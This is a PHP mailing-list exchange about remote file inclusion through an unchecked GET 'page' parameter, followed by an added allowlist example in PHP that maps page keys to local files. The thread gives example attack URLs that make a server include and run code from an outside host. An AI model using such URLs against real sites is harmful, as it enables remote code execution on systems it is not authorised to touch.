I don't think I'd let someone pass any page they wanted via a GET and just include that page.
If you have URL fopen wrappers on, I can create a page on my server and include it in your page and pretty much execute any code I want on your server.
Example:
http://www.yourdomain.com?yourscript.php?page=http://mydomain.com/myscript.php
Now my code is included in your page and executed. Do you really trust me to only have nice code in my page?
This is a very good point. Definitely make sure you know what you are including. If you are predefining the names of the files to be included and then using $_GET['page'] to pass the name of the variable (which was being done in files.inc.php), you have control over the files that are included. Nevertheless, be careful. If you have register_globals on, I am not sure what would happen if you had:
http://yousite.com/index.php?page=home&home=http://othersite.com/bad.php
Although I think you would still be ok.
- Brad
-- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
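
The predefined-names approach discussed in this thread, as an added example that is not part of the original messages and is not the contents of files.inc.php: the request supplies only a key, and the key is looked up in a constant array, so there is no request-named variable for extra query parameters to populate. The page keys, file names, `pages` directory and the `resolve_page()` helper are all constructed for illustration.

```php
<?php
declare(strict_types=1);

// Constructed allowlist: page key => local include file.
// A constant cannot be overwritten by request data, whatever register_globals is set to.
const PAGES = [
    'home'    => 'home.inc.php',
    'news'    => 'news.inc.php',
    'contact' => 'contact.inc.php',
];
const PAGE_DIR     = __DIR__ . '/pages'; // assumed location of the include files
const DEFAULT_PAGE = 'home';

/**
 * Map an untrusted page key to a local file path.
 * The request value is only ever used as an array key, never as part of a path
 * and never as a variable name ($$page), so a URL or an unknown name cannot be included.
 *
 * @param mixed $requested raw value of $_GET['page'] (string, array or null)
 */
function resolve_page($requested): string
{
    // ?page[]=x arrives as an array; anything that is not a string gets the default.
    $key = is_string($requested) ? $requested : DEFAULT_PAGE;

    // Exact key match only; unknown keys fall back instead of reaching include.
    if (!array_key_exists($key, PAGES)) {
        $key = DEFAULT_PAGE;
    }
    return PAGE_DIR . '/' . PAGES[$key];
}

// Constructed inputs: a valid key, the URL form from the thread, an unknown key,
// an array value and a missing parameter.
$samples = ['news', 'http://mydomain.com/myscript.php', 'admin', ['news'], null];
foreach ($samples as $sample) {
    printf(
        "%-42s -> %s\n",
        json_encode($sample, JSON_UNESCAPED_SLASHES),
        resolve_page($sample)
    );
}

// In the page script the include then becomes:
// require resolve_page($_GET['page'] ?? null);
```

Only `news` resolves to `news.inc.php`; every other sample input resolves to the default `home.inc.php` under `PAGE_DIR`.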